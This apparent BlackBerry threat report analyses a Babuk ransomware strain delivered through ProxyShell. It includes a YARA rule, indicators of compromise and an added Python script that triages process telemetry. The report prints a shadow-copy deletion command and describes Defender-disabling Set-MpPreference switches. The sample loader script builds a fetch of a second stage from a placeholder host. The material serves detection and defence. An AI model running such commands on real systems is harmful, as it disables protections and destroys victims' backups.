Babuk Ransomware Modifies Attack Methods to Double Extortion


First appearing in early 2021, the Babuk ransomware recently made headlines for using the ProxyShell vulnerabilities in Microsoft® Exchange Server to deploy its ransom payload. This is an attack method that has already been used by ransomware groups such as Conti and LockFile.

The malware mainly targets Windows® devices, encrypting victims’ files with an AES-256 algorithm. In April 2021, the Babuk group released a statement that it would change its approach to include double extortion, a technique that became increasingly common in 2021, with groups such as REvil deploying it with devastating results. Double extortion means data is both encrypted locally and exfiltrated before a ransom demand is made, which gives the technique the potential to be far more damaging than the traditional ransom note.

Operating system

Windows®

Risk and impact


Babuk was originally offered as Ransomware-as-a-Service (RaaS), a popular way for threat actors to distribute and sell their malicious services through underground forums. However, in July 2021, the Babuk ransomware builder files were leaked online by one of the original creators. The leak contained the files shown in Figure 1.

Figure 1 – Babuk builder files disclosed by the developer

Since then, the source code has been used by different threat actors to build their own ransomware payloads. As a result, many ransomware strains with properties identical to the original Babuk have appeared in the wild and in online malware repositories.

The leaked source code also contained decryption keys, which researchers have since used to create free decryption tools for some strains. (NOTE: A decryptor for the variant shown in this report is not yet publicly available.)

Technical analysis

The file analyzed in this report is a relatively new strain that first appeared in October 2021. To deliver its payload, this release uses ProxyShell, a set of Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) that can be chained to bypass authentication and execute code as a privileged user on the Exchange server.

The threat actor associated with this strain is known as Tortilla. Tortilla is a group first identified in July 2021, and it is widely associated with attacks targeting US-based victims.

The attack chain begins when the initial loader, a .NET executable, is dropped on the targeted server. Embedded in the file is a base64-encoded PowerShell command, as shown in Figure 2.

Figure 2 – Initial .NET Loader with Obfuscated PowerShell Command

Figure 3 – Decoded PowerShell Script

Once decoded, as shown in Figure 3, the command reveals what the initial loader is trying to achieve: it issues a web request to the attacker’s repository to retrieve and execute the next stage in the attack chain.

The decoded script also tampers with Microsoft Defender in order to blunt its Antimalware Scan Interface (AMSI) script inspection and other protections. It does this with the “Set-MpPreference” cmdlet, disabling real-time monitoring, script scanning, behavior monitoring, IOAV (download and attachment) protection, and the intrusion prevention system.

The main loader of the recovered ransomware is also written for the .NET Framework and disguises itself as an inventory management system, as shown in Figure 4. This file is heavily obfuscated and carries the malicious payload encrypted inside it.

Figure 4 – Main ransomware loader disguised as an inventory management system

The loader opens a TCP connection on port 443 to the IP address 168[.]119[.]93[.]163, as shown in Figure 5. This is done to download a module that decrypts the malicious payload stored in the resources of the main loader file shown in Figure 4.

Figure 5 – The TCP connection is created to retrieve the decryption module

The recovered decryption module creates a copy of “AddInProcess32.exe” in the user’s “AppData\Local\Temp” directory, as shown in Figure 6. AddInProcess32.exe is a Microsoft-signed .NET binary that can be started in suspended mode and used as an injection host, which is why it is abused here to get around Windows Defender Application Control.

Figure 6 – Duplicate version of AddInProcess32.exe in the Temp directory

Babuk attempts to tamper with the Volume Shadow Copy snapshots on the victim machine. Shadow copies are a backup technology built into Windows, and attackers delete them so that victims cannot easily recover encrypted data and avoid paying the ransom. The following command is executed to perform this action:

C:\Windows\System32\cmd.exe /c vssadmin.exe delete shadows /all /quiet
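The behaviours described above (the base64-encoded PowerShell stage, the Set-MpPreference tampering, the AddInProcess32.exe copy in Temp, and the shadow copy deletion) all leave traces in process-creation telemetry. The following is an added example that triages such records for each of them; it is not BlackBerry’s code and not the Tortilla loader. The sample events, the loader script they carry and the paths in SAMPLE_EVENTS are constructed here to resemble what the report describes, and the record layout (image path plus command line) is an assumption rather than a real product’s schema.

```python
"""Triage of process-creation records for the loader behaviours described above.

Added example; not BlackBerry's code or the Tortilla loader. The sample
events are constructed to resemble the report, and the record layout
(image path + command line) is an assumption, not a real product schema.
"""
from __future__ import annotations

import base64
import re
from typing import Optional

# Set-MpPreference switches the decoded loader script uses against Defender.
DEFENDER_TAMPER_SWITCHES = {
    "DisableRealtimeMonitoring", "DisableScriptScanning",
    "DisableBehaviorMonitoring", "DisableIOAVProtection",
    "DisableIntrusionPreventionSystem",
}
# Download cradles typical of a first-stage PowerShell loader.
DOWNLOAD_CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
# vssadmin / wmic shadow copy deletion, as run by the Babuk payload.
SHADOW_DELETE_RE = re.compile(
    r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_CMD_RE = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# The only directories the signed .NET add-in host legitimately runs from.
LEGIT_ADDIN_DIRS = ("c:\\windows\\microsoft.net\\framework\\",
                    "c:\\windows\\microsoft.net\\framework64\\")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument (base64 over UTF-16LE), or None."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def tampered_defender_settings(script: str) -> set[str]:
    """Defender features a script turns off via Set-MpPreference -Disable* $true / 1."""
    found = set()
    for stmt in re.finditer(r"Set-MpPreference[^;\n|]*", script, re.I):
        for sw in DEFENDER_TAMPER_SWITCHES:
            if re.search(rf"-{sw}\s+(?:\$true|1)\b", stmt.group(0), re.I):
                found.add(sw)
    return found


def triage_event(image: str, cmdline: str) -> list[str]:
    """Behaviours from the report exhibited by one process-creation record."""
    hits: list[str] = []
    script = decode_encoded_command(cmdline)
    if script is not None:
        hits.append("encoded_powershell")
        tampered = tampered_defender_settings(script)
        if tampered:
            hits.append("defender_tampering:" + ",".join(sorted(tampered)))
        if DOWNLOAD_CRADLE_RE.search(script):
            hits.append("download_cradle")
    if SHADOW_DELETE_RE.search(cmdline):
        hits.append("shadow_copy_deletion")
    path = image.lower().replace("/", "\\")
    if path.endswith("\\addinprocess32.exe") and not path.startswith(LEGIT_ADDIN_DIRS):
        hits.append("addinprocess32_outside_framework_dir")
    return hits


def encode_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample data (not captured telemetry): a loader script modelled on
# the decoded stage the report describes, then four records mirroring its stages.
LOADER_SCRIPT = (
    "Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true "
    "-DisableBehaviorMonitoring $true -DisableIOAVProtection $true "
    "-DisableIntrusionPreventionSystem $true; "
    "Invoke-WebRequest -Uri http://example.invalid/stage2.exe -OutFile $env:TEMP\\stage2.exe"
)
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + encode_powershell(LOADER_SCRIPT)),
    ("C:\\Windows\\System32\\cmd.exe", "cmd.exe /c vssadmin.exe delete shadows /all /quiet"),
    ("C:\\Users\\victim\\AppData\\Local\\Temp\\AddInProcess32.exe",
     "AddInProcess32.exe /guid:00000000-0000-0000-0000-000000000000 /pid:4321"),
    ("C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe",
     "AddInProcess32.exe /guid:00000000-0000-0000-0000-000000000000 /pid:1234"),
]


def triage_all(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    """Map each record's image path to the behaviours it exhibits."""
    return {image: triage_event(image, cmd) for image, cmd in events}


if __name__ == "__main__":
    for image, hits in triage_all().items():
        print(f"{image}\n    -> {hits or ['no findings']}")
```

The encoded command is decoded as UTF-16LE because that is what powershell.exe expects from -EncodedCommand; a plain UTF-8 decode of the same bytes yields interleaved null characters and would miss the Set-MpPreference switches. The AddInProcess32.exe check deliberately keys on the image path rather than the file name, since the legitimate binary under Microsoft.NET\Framework is expected on every host.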

The malware creates a mutex named “DoYouWantToHaveS*xWithCuongDong”, as shown in Figure 7. This appears to be a misspelled reference to the security researcher who first analyzed the Babuk ransomware in early 2021.

Figure 7 – Ransomware payload creates the “DoYouWantToHaveS*xWithCuongDong” mutex

The unpacked Babuk payload is injected into the AddInProcess32.exe process and executed. The malware begins its infection by encrypting files with an AES-256 algorithm; encrypted files receive a “.babyk” extension, as shown in Figure 8. Certain file extensions and folders are excluded from encryption so as not to damage essential system files, which would alert the victim to the threat prematurely.

Figure 8 – Files Encrypted with .babyk Extension and Ransom Note

A ransom note named “How To Restore Your Files.txt” is dropped on the desktop, as shown above. It informs the victim that their files have been encrypted and sets out the threat actors’ demands, as shown in Figure 9.

If the victim does not comply, the note threatens to publish the victim’s sensitive data. As proof of this intent, it provides a link to a “private” page containing leaked data. The attacker also gives the victim a Tor address where further instructions and the means to pay the ransom can be found.

Figure 9 – Ransom note informing the victim of an attack


The double extortion technique used by Babuk gives it the potential to harm far more people from a single compromised business. If an attacker only encrypts a company’s data without exfiltrating it, the damage stops at that company. If the data is also exfiltrated, sensitive information about the business and its employees, customers and partners can be made public, extending the damage well beyond the victim.

The added threat of reputational damage increases the pressure on victims to pay the ransom. The new attack method adopted by Babuk, together with the leak of its source code, means the threat is likely to remain a significant part of the ransomware landscape for the foreseeable future.

YARA rule

The following YARA rule was written by the BlackBerry Research & Intelligence team to detect the threat described in this document:

import "pe"

rule Babuk_Ransomware {
    meta:
        description = "Detects Babuk Ransomware"
        author = "BlackBerry Threat Research Team"
        date = "2021-11-16"
        hash = "752d66990097c8be7760d8d6011b1e91daa1d5518951d86f9fdf3d126d54872a"
        license = "This Yara rule is provided under the Apache 2.0 license and open to any user or organization, as long as you use it under this license and ensure you as the author credit any derivative to the BlackBerry Research & Intelligence team"

    strings:
        $s1 = "EfsrTiny"
        $s2 = "SymantecPKI-1-5670"
        $s3 = "EfsPotato"
        $s4 = "Symantec Corporation1"
        $s5 = "ado.exe"
        $s6 = "RpcInterfaceInformation"
        $s7 = "v2.0.50727"

    condition:
        // PE file
        uint16(0) == 0x5a4d and

        // .NET executable
        pe.imports("mscoree.dll", "_CorExeMain") and

        // PE sections
        pe.number_of_sections == 3 and

        // Checksum is set and matches
        pe.checksum == pe.calculate_checksum() and

        // All strings
        all of ($s*)
}

Indicators of Compromise (IoC)

SHA-256

  • 752d66990097c8be7760d8d6011b1e91daa1d5518951d86f9fdf3d126d54872a

URL

  • http://fbi[.]bottoms/tortillas/tortillas[.]exe

IP address

  • 168[.]119[.]93[.]163

Mutex

  • DoYouWantToHaveS*xWithCuongDong

File names and paths

  • How To Restore Your Files.txt (ransom note dropped on the desktop)
  • Users\<user>\AppData\Local\Temp\AddInProcess32.exe

File extension

  • .babyk, appended to all affected files after encryption

BlackBerry Support

If you’ve been battling this malware or a similar threat, you’ve come to the right place, regardless of your existing BlackBerry relationship.

The BlackBerry Incident Response team is made up of world-class consultants dedicated to managing response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.

We have a global team of consultants on hand to help provide round-the-clock support, if needed, as well as local support. Please contact us here:

BlackBerry Research and Intelligence Team

About the BlackBerry Research & Intelligence team

The BlackBerry Research & Intelligence team examines emerging and persistent threats, providing intelligence analysis for the benefit of defenders and the organizations they serve.
